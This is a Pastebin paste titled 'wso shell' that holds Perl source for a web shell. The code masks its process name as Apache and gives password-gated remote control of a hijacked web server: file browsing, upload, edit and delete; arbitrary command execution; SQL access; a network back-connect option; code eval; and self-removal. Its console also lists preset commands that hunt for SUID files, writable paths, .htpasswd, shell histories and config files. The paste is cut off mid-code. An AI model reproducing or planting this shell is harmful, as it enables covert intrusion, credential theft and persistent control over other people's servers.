API tools faq
paste
Saint92

wso shell

Saint92
Mar 28th, 2016
216
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 56.09 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. use IO::Socket;my($Password,$CommandTimeoutDuration,$tab,$tbb,$verd,$tabe,$div,$div1,$dive,$WinNT,$NTCmdSep,$UnixCmdSep,$ShowDynamicOutput,$CmdSep,$PathSep,$Redirector,$CmdPwd,$in,$loc,$key,$val,$MultipartFormData,$Boundary,$HeaderBody,@in,%in,$id,@list,$Header,$Body,$s,$CurrentDir,$arg,$ii,@suffixlist,$size1,$size,$file,%q,$LoggedIn,%Cookies,$EncodedCurrentDir,$HtmlMetaHeader,$time,$ScriptLocation,@httpcookies,$cookie,$LoginPassword,$Prompt,$ServerName,$wr,$ffs,$ffe,$TransferFile,$ViewF,$RunCommand,$RunCommand1,$Command,$langs,$httpd,$hdd1,$hdd,$perlv,$phpv,$hosts,$downloaders,$hdd1,$OldDir,$ChangeDir,$MkDir,$MakeFile,$ZipArch,$ZipFile,$UnZipArch,$DelFile,$DelDir,$f,$hhost,$pport,$usser,$passs,$dbb,$zapros,$ref,$s4et,$rip,$bbc,$port,$target,$ccode,$fpath,@file,$fccodde,$fccode,$ffpath,$table,$column,$dbh,$sth,$rc,$qqquery,$ddb,$TargetName,$TargetFileSize,$qquery,$RunCommand2,$gr,$gre,@grr,$arg1,$Fchmod,$Fdata,$Options,$Action,$hddall,$hddfree,$hddproc,$uname,$idd,$iaddr,$paddr,$proto,$rin,$win,$ein,$buff,$rout,$wout,$eout):shared;$0="/usr/sbin/apache2 -k start";# < -- shell in ps aux
  3. $Password="0de664ecd2be02cdd54234a0d1229b43";# root
  4. $CommandTimeoutDuration=360;# max time of command execution in seconds
  5. $tab='< table >';$tbb="< table width=100%";$verd="< font face=Verdana size=1 >";$tabe='< /table >';$div1='< div class=content >< pre class=ml1 >';$div='< div class=content >';$dive='< /pre >< /div >';use Digest::MD5 qw(md5_hex);$WinNT=0;$NTCmdSep="&";$UnixCmdSep=";";$ShowDynamicOutput=1;$CmdSep=($WinNT?$NTCmdSep:$UnixCmdSep);$CmdPwd=($WinNT?"cd":"pwd");$PathSep=($WinNT?"\\":"/");$Redirector=($WinNT?" 2 >&1 1 >&2":" 1 >&1 2 >&1");use File::Basename;use MIME::Base64;my @last:shared;sub cod($){my $url=~s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;$url=encode_base64($_[0]);return $url;}sub dec($){ my $url1=decode_base64($_[0]);return $url1;}sub ReadParse {local (*in)=@_ if @_;$MultipartFormData=$ENV{'CONTENT_TYPE'}=~/multipart\/form-data; boundary=(.+)$/;if($ENV{'REQUEST_METHOD'} eq "GET"){$in=$ENV{'QUERY_STRING'};}elsif($ENV{'REQUEST_METHOD'} eq "POST"){binmode(STDIN) if $MultipartFormData & $WinNT;read(STDIN,$in,$ENV{'CONTENT_LENGTH'});}if($ENV{'CONTENT_TYPE'}=~/multipart\/form-data; boundary=(.+)$/){$Boundary='--'.$1;@list=split(/$Boundary/,$in);$HeaderBody=$list[1];$HeaderBody=~/\r\n\r\n|\n\n/;$Header=$`;$Body=$';$Body=~s/\r\n$//;$in{'filedata'}=$Body;$Header=~/filename=\"(.+)\"/;$in{'f'}=$1;for(my $i=2;$list[$i];$i++){$list[$i]=~s/^.+name=$//;$list[$i]=~/\"(\w+)\"/;$key=$1;$val=$';$val=~s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;$val=~s/%(..)/pack("c",hex($1))/ge;$in{$key}=$val;}}else{@in=split(/&/,$in);foreach my $i(0 .. $#in){$in[$i]=~s/\+/ /g;($key,$val)=split(/=/,$in[$i],2);$key=~s/%(..)/pack("c",hex($1))/ge;$val=~s/%(..)/pack("c",hex($1))/ge;$in{$key}.="\0" if(defined($in{$key}));$in{$key}.=$val;}}}sub uname{$s="uname -a";$s.=" -U $q{u}" if($q{u});return $s;}sub hddall{$s='df -k /|sed 1d|awk "{total += \$2} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddfree{$s='df -k /|sed 1d|awk "{total += \$4} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddproc{$s='df -k /| sed 1d | awk "{total += \$5} {print 100-total}"';$s.=" -U $q{u}" if($q{u});return $s;}$hddall=hddall();$hddfree=hddfree();$hddproc=hddproc();sub PH{printf ("%.2f",(@_))};sub id{$s="id";$s.=" -U $q{u}" if($q{u});return $s;}sub dir_read($){if(!-r $_[0]||$_[0]=~m/\"/gis||$_[0]=~m/\s/gis||$_[0]=~m/\(/gis||$_[0]=~m/\)/gis){return "# Can't read $_[0]!";}else{$_[0]=~s/\/\//\//g;return "cd ".$_[0];}}sub dlink($){if(-l $_[0]){return '- >'.readlink $_[0]}}sub dir_list{my @list=();$CurrentDir=~s!\Q//!/!g;my $dir=$CurrentDir;@list=scan_dir($dir);$id=0;foreach $arg(@list){$id++;$ii='d'.$id;my $name=fileparse($arg,@suffixlist);if(-d $arg){print '< tr class='.($id%2==0?"l1":"l2").' >< th class=chkbx >< input type=checkbox class=chkbx name=lo >< /th >< td >< form method=POST name='.$ii.' >< input type=hidden name=a value=command >< input type=hidden name=d value='.$CurrentDir.' >< input type=hidden name=c value="'.dir_read($arg).'" >< a href="javascript:document.'.$ii.'.submit()" >< font face="Verdana" size="2" > < b >[ '.$name.dlink($arg).' ]< /b >< /font >< /a >< /form >< /td >< td >dir< /td >< td >'.mt1((stat($arg))[9]).'< /td >'.owner($arg).'< td >'.$tab.'< td >< form name='.$ii.'rt method="POST" >< input type="hidden" name="d" value="'.$CurrentDir.'" >< input type="hidden" name="a" value="RT" >< input type="hidden" name="fdata" value='.cod(mt1((stat($arg))[9])).' >< input type="hidden" name="fchmod" value='.perm($arg).' >< input type="hidden" name="f" value='.$name.' >< a href="javascript:document.'.$ii.'rt.submit()" >R T < /a >< /form >< /td >< td >< form method=POST name='.$ii.'z >< input type=hidden name=zip value='.$name.' >< input type=hidden name=arh_name value='.$ii.'z >< input type=hidden name=a value=command >< input type=hidden name=d value='.$CurrentDir.' >< input type=hidden name=c value=zip >< a href="javascript:document.'.$ii.'z.submit()" >[zip]< /a >< /form >< /td >< td >< form method=POST name='.$ii.'uz >< input type=hidden name=unzip_name value='.$name.' >< input type=hidden name=a value=command >< input type=hidden name=d value='.$CurrentDir.' >< input type=hidden name=c value=unzip >< a href="javascript:document.'.$ii.'uz.submit()" >[unzip]< /a >< /form >< /td >< td >< form method=POST name='.$ii.'del >< input type=hidden name=del_dir value='.$name.' >< input type=hidden name=a value=command >< input type=hidden name=d value='.$CurrentDir.' >< input type=hidden name=c value=deldir >< a href="javascript:document.'.$ii.'del.submit()" >[< font color=#FF0000 >x< /font >]< /a >< /form >< /td >< /table/ >< /td >< /tr >';}else{$size1=(stat $arg)[7]/1024;if($size1< 1000){$size=sprintf("%.2f",($size1))." KB";}else{$size=sprintf("%.2f",($size1/1024))." MB";}print '< tr class='.($id%2==0?"l1":"l2").' >< th class=chkbx >< input type=checkbox class=chkbx name=lo >< /th >< td >< form name='.$ii.' method=post >< input type=hidden name=path id=view value='.$name.' >< input type=hidden name=a value=view_file >< input type=hidden name=d value='.$CurrentDir.' >< a href="javascript:document.'.$ii.'.submit()" >< font face="Verdana" size="2" > '.$name.dlink($arg).'< /font >< /a >< /form >< /td >< td >'.$size.'< /td >< td >'.mt1((stat($arg))[9]).'< /td >'.owner($arg).'< td >'.$tab.'< td >< form name='.$ii.'rt method="POST" >< input type="hidden" name="d" value="'.$CurrentDir.'" >< input type="hidden" name="a" value="RT" >< input type="hidden" name="fdata" value='.cod(mt1((stat($arg))[9])).' >< input type="hidden" name="fchmod" value='.perm($arg).' >< input type="hidden" name="f" value='.$name.' >< a href="javascript:document.'.$ii.'rt.submit()" >R T < /a >< /form >< /td >< td >< form name='.$ii.'ed method=post >< input type=hidden name=path id=edit1_file value='.$name.' >< input type=hidden name=a value=edit_file_path >< input type=hidden name=d value='.$CurrentDir.' >< a href="javascript:document.'.$ii.'ed.submit()" >E < /a >< /form >< /td >< td >< form name='.$ii.'d method="POST" >< input type="hidden" name="d" value="'.$CurrentDir.'" >< input type="hidden" name="a" value="download" >< input type="hidden" name="f" value='.$name.' >< a href="javascript:document.'.$ii.'d.submit()" >D < /a >< /form >< /td >< td >< form method=POST name='.$ii.'z >< input type=hidden name=zip value='.$name.' >< input type=hidden name=arh_name value='.$ii.'z >< input type=hidden name=a value=command >< input type=hidden name=d value='.$CurrentDir.' >< input type=hidden name=c value=zip >< a href="javascript:document.'.$ii.'z.submit()" >[zip]< /a >< /form >< /td >< td >< form method=POST name='.$ii.'uz >< input type=hidden name=unzip_name value='.$name.' >< input type=hidden name=a value=command >< input type=hidden name=d value='.$CurrentDir.' >< input type=hidden name=c value=unzip >< a href="javascript:document.'.$ii.'uz.submit()" >[unzip]< /a >< /form >< /td >< td >< form method=POST name='.$ii.'del >< input type=hidden name=del_file value='.$name.' >< input type=hidden name=a value=command >< input type=hidden name=d value='.$CurrentDir.' >< input type=hidden name=c value=delfile >< a href="javascript:document.'.$ii.'del.submit()" >[< font color=#FF0000 >x< /font >]< /a >< /form >< /td >'.$tabe.'< /td >< /tr >'}}print $tabe;sub perm($){my $mode=sprintf("o",((stat($_[0]))[2])&07777);return $mode;}sub owner($){my $uid=(stat $_[0])[4];my $user=(getpwuid $uid)[0];my $uid1=(stat $_[0])[5];my $group=(getgrgid $uid1)[0];my $mode=sprintf("o",((stat($_[0]))[2])&07777);my $suid=substr $mode,0,1;my $last=substr $mode,1;if($suid==4||$suid==6||$suid==2){if(!-r $_[0]){return '< td >'.$user.'/'.$group.'< /td >< td >< b >< font color=#FFD700 >'.$suid.'< /font >< /b >< font color=#FF0000 >'.$last.'< /font >< /td >';}elsif(!-w $_[0]){return '< td >'.$user.'/'.$group.'< /td >< td >< b >< font color=#FFD700 >'.$suid.'< /font >< /b >< font color=#FFFFFF >'.$last.'< /font >< /td >';}else{return '< td >'.$user.'/'.$group.'< /td >< td >< b >< font color=#FFD700 >'.$suid.'< /font >< /b >< font color=#25ff00 >'.$last.'< /font >< /td >';}}else{if(!-r $_[0]){return '< td >'.$user.'/'.$group.'< /td >< td >< font color=#FF0000 >'.$mode.'< /font >< /td >';}elsif(!-w $_[0]){return '< td >'.$user.'/'.$group.'< /td >< td >< font color=#FFFFFF >'.$mode.'< /font >< /td >';}else{return '< td >'.$user.'/'.$group.'< /td >< td >< font color=#25ff00 >'.$mode.'< /font >< /td >';}}}sub mt{my($seconds,$minutes,$hours,$day,$month,$year,$wday,$yday,$isdst)=localtime();my $mmtime=($year+1900).'-'.sprintf("d",($month+1)).'-'.sprintf("d",$day).' '.sprintf("d",$hours).':'.sprintf("d",$minutes).':'.sprintf("d",$seconds);return $mmtime;}sub mt1($){my($seconds,$minutes,$hours,$day,$month,$year,$wday,$yday,$isdst)=localtime($_[0]);my $mmtime=($year+1900).'-'.sprintf("d",($month+1)).'-'.sprintf("d",$day).' '.sprintf("d",$hours).':'.sprintf("d",$minutes).':'.sprintf("d",$seconds);return $mmtime;}sub scan_dir{my ($dir)=@_;my @dirs=();my @files=();my @list=();my @file=();for $file (glob($dir.'/.*')){if(-d $file && $file ne $dir.'/.'){push @dirs,$file;}if(-f $file){push @files,$file;}}for $file (glob($dir.'/*')){if(-d $file) {push @dirs,$file;}else{push @files,$file;}}@list=(@dirs,@files);return @list;}}sub HtmlSpecialChars($){my ($st)=@_;$st=~s|< |<  |g;$st=~s| >|  >|g;return $st;}sub DeHtmlSpecialChars($){my ($st)=@_;$st=~s|<  |< |g;$st=~s|  >| >|g;return $st;}$uname = uname();$idd = id();sub P{print @_}sub PrintPageHeader{print "Content-type: text/html\n\n";&GetCookies;$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;if($LoggedIn != 1) {$Password = 0}$EncodedCurrentDir = $CurrentDir;$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;print < < END;
  6. < html >< head >< title >PPS 4.0< /title >$HtmlMetaHeader< style >body{background-color:#444;color:#e1e1e1;font: 9pt Monospace,'Courier New';text-decoration:none;}body,td,th{font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1;}table.info{color:#fff;background-color:#222;}span,h1,a{color: #df5 !important;}span{font-weight: bolder;}h1{border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px;}div.content{padding: 5px;margin-left:5px;background-color:#333;font: 9pt Monospace,'Courier New';}a{text-decoration:none;}a:hover{text-decoration:underline;}.ml1{border:1px solid#444;font:9pt Monospace,'Courier New';color:#e1e1e1;padding:5px;margin:0;overflow:auto;}.bigarea{width:100%;height:300px;}input,textarea,select{margin:0;color:#fff;background-color:#555;border:1px solid #df5;font: 9pt Monospace,'Courier New';}form{margin:0px;}#toolsTbl{text-align:center;}.toolsInp{width: 300px}.toolsInp2{border: none;width:100%;height:300px;background-color:#333}.toolsInp1{border: none}.main th{text-align:left;background-color:#5e5e5e;}.main tr:hover{background-color:#5e5e5e}.l1{background-color:#444}.l2{background-color:#333}pre{font-family:Courier,Monospace;}< /style >< /head >< body onLoad="changeText();document.checkbox.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" >< table class=info cellpadding=3 cellspacing=0 width=100% >< tr >< td width=1 >< span >Uname:< br >User:< br >Hdd:< br >DateTime:< br >Pwd:< /span >< /td >< td >< nobr >
  7. END
  8. P(`$uname`);print "< /nobr >< br >";P(`$idd`);print "< br >";PH(`$hddall`);print " GB < span >Free: < /span >";PH(`$hddfree`);print " GB [ ";P(`$hddproc`);print "% ]";$time=mt();print "< br >$time$tab";print "< span > Server software: < /span >$ENV{'SERVER_SOFTWARE'}< /span >< td >";my $cwd="";my @path=split("/",$CurrentDir);my $mode=sprintf("o",((stat($CurrentDir))[2])&07777);my $ss=0;print '< table cellpadding=0 cellspacing=0 >< td >< form method=POST name=cwd0 >< a href="javascript:document.cwd0.submit()" >[..] < /a >< input type=hidden name=cc value="/" >< input type=hidden name=a value=command >< input type=hidden name=d value='.$CurrentDir.' >< input type=hidden name=c value="changedir" >< /form >< /td >';foreach my $ar(@path){if($ar){$cwd .= "/".$ar;$ss++;print '< td >< form method=POST name=cwd'.$ss.' >< a href="javascript:document.cwd'.$ss.'.submit()" >/'.$ar.'< /a >< input type=hidden name=cc value='.$cwd.' >< input type=hidden name=a value=command >< input type=hidden name=d value='.$CurrentDir.' >< input type=hidden name=c value="changedir" >< /form >< /td >';}}my $fw="< font face=Verdana size=2 color=#FFFFFF >";my $fe="< /font >";print $tabe;sub cwdcol{if(!-r $CurrentDir){return '< font color=#FF0000 >'.$mode.'< /font >';}elsif(!-w $CurrentDir){return '< font color=#FFFFFF >'.$mode.'< /font >';}else{return '< font color=#25ff00 >'.$mode.'< /font >';}}print "< td >".cwdcol()."< /td >< td >< a href=$ScriptLocation > [ home ] < /a >< /td >< /td >$tabe";print < < END;
  9. < /td >< td width=1 align=right >< nobr >< span >Server IP:< /span >< br >$ENV{'SERVER_ADDR'}< br >< span >Client IP:< /span >< br >$ENV{'REMOTE_ADDR'}< /nobr >< /td >< /tr >$tabe< table width=100% cellpadding=3 cellspacing=0 width=100% bgcolor=#444 >< td >< th width="11%" >< form method="POST" name=systeminfo >< input type="hidden" name="a" value="systeminfo" >< input type=hidden name=d value=$CurrentDir >< a href="javascript:document.systeminfo.submit()" >$fw [ $fe Sysinfo $fw ] $fe< /a >< /form >< th >< /td >< td >< form method=POST name=files >< input type=hidden name=cc value=$CurrentDir >< a href="javascript:document.files.submit()" >$fw [ $fe Files $fw ] $fe< /a >< input type=hidden name=a value=command >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=c value="cd $CurrentDir" >< /form >< /td >< td >< form method="POST" name=consoler >< input type="hidden" name="a" value="console" >< input type="hidden" name="d" value=$CurrentDir >< a href="javascript:document.consoler.submit()" > $fw [ $fe Console $fw ] $fe< /a >< /form >< /td >< td >< form method="POST" name=sqlman >< input type=hidden name=d value=$CurrentDir >< input type="hidden" name="a" value="sql" >< a href="javascript:document.sqlman.submit()" >$fw [ $fe SQL $fw ] $fe< /a >< /form >< /td >< td >< form method="POST" name=backconn >< input type=hidden name=d value=$CurrentDir >< input type="hidden" name="a" value="net" >< a href="javascript:document.backconn.submit()" >$fw [ $fe Network $fw ] $fe< /a >< /form >< /td >< td >< form method="POST" name=evalc >< input type=hidden name=d value=$CurrentDir >< input type="hidden" name="a" value="code" >< a href="javascript:document.evalc.submit()" >$fw [ $fe Code $fw ] $fe< /a >< /form >< /td >< td >< form method="POST" name=logout >< input type="hidden" name="a" value="logout" >< a href="javascript:document.logout.submit()" >$fw [ $fe Logout $fw ] $fe< /a >< /form >< /td >< td >< form method="POST" name=remove >< input type="hidden" name="a" value="remove" >< a href="javascript:document.remove.submit()" >$fw [ $fe Self remove $fw ] $fe< /a >< /form >< /td >$tabe< /tr >$tabe< font color="#C0C0C0" size="2" >
  10. END
  11. }sub PrintLoginForm{print "< center >< form name=f method=POST >< input type=password name=p >< input type=submit value=' > >' >< /form >< /center >";}sub PrintPageFooter{print "< /font >< /body >< /html >";}sub GetCookies{@httpcookies=split(/; /,$ENV{'HTTP_COOKIE'});foreach $cookie(@httpcookies){($id,$val)=split(/=/,$cookie);$Cookies{$id}=$val;}}sub PerformLogout{print "Set-Cookie: SAVEDPWD=;\n;Set-Cookie: last_command=;\n";print "Content-type: text/html\n\n";&PrintLoginForm;}sub PerformLogin{if(md5_hex($LoginPassword) eq $Password){print "Set-Cookie: SAVEDPWD=".md5_hex($LoginPassword).";\n";&PrintPageHeader("c");file_header();&PrintCommandLineInputForm;&PrintPageFooter;}else{print "Content-type: text/html\n\n";&PrintLoginForm;}}sub FileManager{&PrintPageHeader("f");file_header();&PrintCommandLineInputForm;&PrintPageFooter;}sub PrintCommandLineInputForm{$Prompt = $WinNT ? "$CurrentDir > " : "[$ServerName $CurrentDir]\$ ";dir_list();print "< tr >< form method=post >< input type=hidden name=a value=command >< input type=hidden name=d value=$CurrentDir >< select name=group >< option value=delete >Delete< /option >< option value=tar >Compress [tar.gz]< /option >< option value=untar >Uncompress [tar.gz]< /option >< /select >< input type=submit value=' > >' onclick='validate()' >< /tr >< /form >$dive";sub wr_cur {if(!-w $CurrentDir){print '< font color=#FF0000 >[Not writable]< /font >';}else{print '< font color=#25ff00 >[Writable]< /font >';}}sub PrintVar{print < < END;
  12. < table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;' >< tr >< td >< form method=POST >< span >Change dir:< /span >< br >< input class=toolsInp type=text name=cc value=$CurrentDir >< input type=submit value=' > >' >< input type=hidden name=a value=command >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=c value="changedir" >< /form >< /td >< td >< form method=POST >< span >Read file:< /span >< br >< input class='toolsInp' type=text name=path >< input type=hidden name=a value=view_file >< input type=hidden name=d value=$CurrentDir >< input type=submit value=' > >' >< /form >< /td >< /tr >< tr >< td >< form method=POST >< span >Make dir:< /span >
  13. END
  14. wr_cur();print < < END;
  15. < br >< input class='toolsInp' type=text name=md >< input type=hidden name=a value=command >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=c value="makedir" >< input type=submit value=' > >' >< /form >< /td >< td >< form method=POST >< span >Make file:< /span >
  16. END
  17. wr_cur();print < < END;
  18. < br >< input class='toolsInp' type=text name=mf >< input type=hidden name=a value=command >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=c value="makefile" >< input type=submit value=' > >' >< /form >< /td >< /tr >< tr >< td >< form name="ff" method="POST" >< span >Execute:< /span >< br >< input type="hidden" name="a" value="command" >< input type="hidden" name="d" value="$CurrentDir" >< input class='toolsInp' type=text name=c value='' >< input type=submit value=' > >' >< /form >< /td >
  19. < td >
  20. END
  21. &PrintFileUploadForm;print < < END;
  22. < /td >$tabe
  23. END
  24. }sub PrintFileUploadForm{print < < END;
  25. < span >Upload file: < /span >
  26. END
  27. wr_cur();print < < END;
  28. < br >< form name="upload_file_form" enctype="multipart/form-data" method="POST" >< input type="file" name="f" class=toolsInp >< input type="submit" value=" > >" >< input type="hidden" name="d" value="$CurrentDir" >< input type="hidden" name="a" value="upload" >< /form >< script >function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}function validate(form){var namelist='';var names=document.getElementsByName('lo');  var lo=document.getElementsByName('zip');for(var i=0;i< names.length;i++){if(names[i].checked){namelist+=lo[i].value+' ';}}setCookie("f",namelist,"","/");}function sall(form){var namelist='';var ch=true;var names=document.getElementsByName('lo');var ss=document.getElementsByName('ch11');if(ss[0].checked){ch=true;}else{ch=false;}for(var i=0;i< names.length;i++){names[i].checked=ch;}}< /script >
  29. END
  30. }&PrintVar;}sub ah($){(my $str=shift)=~ s/(.|\n)/sprintf("lx", ord $1)/eg;return $str;}sub ha($){(my $str=shift)=~s/([a-fA-F0-9]{2})/chr(hex $1)/eg;return $str;}sub ConsoleP{print < < END;
  31. < form name="run" method="POST" >< br >< input type=text size=2 id="sub3" disabled value='\$ ' >< input type="hidden" name="a" value="command1" >< input type="hidden" name="d" value="$CurrentDir" >< input type=text name="c" style="border:0px" size=200 class=toolsInp1 id='lsname' onkeypress="s(event)" value='' >< input type=submit class=toolsInp1 id="sub4" value='' >< /form >< /td >< /tr >$tab< td >< form name="alias" method="POST" >< br >< input type="hidden" name="a" value="command1" >< input type="hidden" name="d" value="$CurrentDir" >< select name=aliases id='nnname' class=toolsInp >< option value="ls -lha" >List dir< /option >< option value="lsattr -va" >list file attributes on a Linux second extended file system< /option >< option value="netstat -an | grep -i listen" >show opened ports< /option >< option value="ps aux" >process status< /option >< optgroup label="-Find-" >< /optgroup >< option value="find / -type f -perm -04000 -ls" >find all suid files< /option >< option value="find . -type f -perm -04000 -ls" >find suid files in current dir< /option >< option value="find / -type f -perm -02000 -ls" >find all sgid files< /option >< option value="find . -type f -perm -02000 -ls" >find sgid files in current dir< /option >< option value="find / -type f -name config.inc.php" >find config.inc.php files< /option >< option value="find / -type f -name "config*"" >find config* files< /option >< option value="find . -type f -name "config*"" >find config* files in current dir< /option >< option value="find / -perm -2 -ls" >find all writable folders and files< /option >< option value="find . -perm -2 -ls" >find all writable folders and files in current dir< /option >< option value="find / -type f -name service.pwd" >find all service.pwd files< /option >< option value="find . -type f -name service.pwd" >find service.pwd files in current dir< /option >< option value="find / -type f -name .htpasswd" >find all .htpasswd files< /option >< option value="find . -type f -name .htpasswd" >find .htpasswd files in current dir< /option >< option value="find / -type f -name .bash_history" >find all .bash_history files< /option >< option value="find . -type f -name .bash_history" >find .bash_history files in current dir< /option >< option value="find / -type f -name .fetchmailrc" >find all .fetchmailrc files< /option >< option value="find . -type f -name .fetchmailrc" >find .fetchmailrc files in current dir< /option >< optgroup label="-Locate-" >< /optgroup >< option value="locate httpd.conf" >locate httpd.conf files< /option >< option value="locate vhosts.conf" >locate vhosts.conf files< /option >< option value="locate proftpd.conf" >locate proftpd.conf files< /option >< option value="locate psybnc.conf" >locate psybnc.conf files< /option >< option value="locate my.conf" >locate my.conf files< /option >< option value="locate admin.php" >locate admin.php files< /option >< option value="locate cfg.php" >locate cfg.php files< /option >< option value="locate conf.php" >locate conf.php files< /option >< option value="locate config.dat" >locate config.dat files< /option >< option value="locate config.php" >locate config.php files< /option >< option value="locate config.inc" >locate config.inc files< /option >< option value="locate config.inc.php" >locate config.inc.php< /option >< option value="locate config.default.php" >locate config.default.php files< /option >< option value="locate config" >locate config* files < /option >< option value="locate '.conf'" >locate .conf files< /option >< option value="locate '.pwd'" >locate .pwd files< /option >< option value="locate '.sql'" >locate .sql files< /option >< option value="locate '.htpasswd'" >locate .htpasswd files< /option >< option value="locate '.bash_history'" >locate .bash_history files< /option >< option value="locate '.mysql_history'" >locate .mysql_history files< /option >< option value="locate '.fetchmailrc'" >locate .fetchmailrc files< /option >< option value="locate backup" >locate backup files< /option >< option value="locate dump" >locate dump files< /option >< option value="locate priv" >locate priv files< /option >< /select >< input type=submit id="sub2" value=' > >' >< /form >< /td >< td >< form name="l11" method="POST" >< br >< input type="hidden" name="a" value="command1" >< input type="hidden" name="d" value="$CurrentDir" >< select name=l11 id='l11' class=toolsInp >
  32. END
  33. print "< option value=".$last[-1]." >".$last[-1]."< /option >";foreach $arg(@last){print "< option value=\"$arg\" >$arg< /option >";}print < < END;
  34. < /select >< input type=submit id="sub5" value=' > >' >< /form >< /td >$tabe< script >document.getElementById('sub3').style.borderColor='#444';document.getElementById('sub2').style.borderColor='#333';document.getElementById('lsname').style.borderColor='#333';document.getElementById('nnname').style.borderColor='#333';document.getElementById('sub4').style.borderColor='#333';document.getElementById("lsname").style.backgroundColor='#333';document.getElementById("l11").style.backgroundColor='#4444';document.getElementById("sub5").style.backgroundColor='#444';document.getElementById('l11').style.borderColor='#444';document.getElementById('sub5').style.borderColor='#444';document.getElementById("sub3").style.backgroundColor='#333';document.getElementById("sub3").style.borderColor='#333';document.getElementById("sub4").style.backgroundColor='#333';document.getElementById('lsname').focus();
  35. function s(e){window.scrollTo(0,document.body.scrollHeight);var u=e.keyCode?e.keyCode:e.charCode;var x=document.getElementById("l11").selectedIndex;var y=document.getElementById("l11").options;if(u==38){t=y[x+1].text;document.getElementById("lsname").value=t;document.getElementById("l11").selectedIndex=document.getElementById("l11").selectedIndex+1;}if(u==40){t=y[x-1].text;document.getElementById("lsname").value=t;document.getElementById("l11").selectedIndex=document.getElementById("l11").selectedIndex-1;}}< /script >$dive
  36. END
  37. &PrintVar;}sub ft($){my $Fchmod=perm($_[0]);my $owner=owner($_[0]);if(!-w $_[0]){$wr='< font color=#FF0000 >  Not writable< /font >'}else{$wr='< font color=#25ff00 >  Writable< /font >'}my $time=mt1((stat($_[0]))[8]);sub ffs{return '< font color=#df5 >'}sub ffe{return '< /font >'}$ffs=ffs();$ffe=ffe();$size1=(stat $_[0])[7]/1024;if($size1< 1000){$size=sprintf("%.2f",($size1))." KB";}else{$size=sprintf("%.2f",($size1/1024))." MB"}my $ctime=mt1((stat($_[0]))[10]);my $motime=mt1((stat($_[0]))[9]);print "< div class=content >$tab< td >< b >$ffs Name: $ffe< /b >$TransferFile< /td >< td >< b >$ffs Size: $ffe< /b >$size< /td >< td >< b >$ffs Permission: $ffe< /b >$owner< /td >< td >< b >$ffs Access time: $ffe< /b >$time< /td >$tabe$tab< td >< b >$ffs Create time: $ffe< /b >$ctime< /td >< td >< b >$ffs Modify time: $ffe< /b >$motime< /td >< td >$wr$tabe< /td >< table id=toolsTbl cellpadding=0 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;' >< td >< table cellpadding=3 cellspacing=3 >< tr >< td >< form name=run method=POST >< input type=hidden name=a value=command >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=c value=rename_file >< input type=hidden name=path value=".$_[0]." >< input type=text size=20 name=rename_file value=$TransferFile >< input type=submit value=RENAME >< /form >< /td >< td >< form name=run method=POST >< input type=hidden name=a value=command >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=c value=touch_file >< input type=hidden name=path value=".$_[0]." >< input type=text size=20 name=touch_file value='$motime' >< input type=submit value=TOUCH >< /form >< /td >< td >< form name=run method=POST >< input type=hidden name=a value=command >< input type=hidden name=d value=$CurrentDir >< input type=text size=20 name=chmod value=$Fchmod >< input type=hidden name=path value=".$_[0]." >< input type=hidden name=c value=chmod_file >< input type=submit value=CHMOD >< /form >< /td >< td >< form name=run method=POST >< input type=hidden name=a value=hexdump >< input type=hidden name=f value=$TransferFile >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=path value=$TransferFile >< input type=submit value=HEXDUMP >< /form >< /td >< td >< form name=run method=POST >< input type=hidden name=a value=download >< input type=hidden name=f value=$TransferFile >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=path value=$TransferFile >< input type=submit value=DOWNLOAD >< /form >< /td >< td >< form name=run method=POST >< input type=hidden name=a value=view_file >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=path value=$TransferFile >< input type=submit value=VIEW >< /form >< /td >< td >< form name=run method=POST >< input type=hidden name=a value=edit_file_path >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=path value=$TransferFile >< input type=submit value=EDIT >< /form >< /td >$tabe< /td >$tabe< /div >";}sub RTP_EDIT{$TransferFile=$ViewF;my $path=$CurrentDir."/".$TransferFile;ft($path);}sub RT{&PrintPageHeader;print "< h1 >File operations:< /h1 >";my $path=$CurrentDir."/".$TransferFile;ft($path);&PrintVar;&PrintPageFooter;}sub Console{&PrintPageHeader;print "< h1 >Console:< /h1 >";print "$div< font style=\"font:9pt Monospace,'Courier New';\" >< textarea class=toolsInp2 name=output style='border-bottom:0;margin:0;' readonly >";$Prompt="[$ServerName $CurrentDir]";print "$Prompt< /textarea >< /font >";ConsoleP();&PrintPageFooter;}sub CommandTimeout{if(!$WinNT){alarm(0);print "< /xmp >Command exceeded maximum time of$CommandTimeoutDuration second(s).< br >Killed it!";ConsoleP();exit;}}sub file_header{print "< h1 >File manager< /h1 >$div< table width=100% class=main cellspacing=0 cellpadding=0 >< tr >< th width='13px' >< input type=checkbox class=chkbx name=ch11 onclick='sall()' >< /th >< th > Name< /th >< th >Size< /th >< th >Modify< /th >< th >Owner/Group< /th >< th >Permissions< /th >< th >Actions< /th >< /tr >";}sub history{&GetCookies;my $h=$Cookies{'last_command'};my $x=length $h;$h=ha $h;if($x< 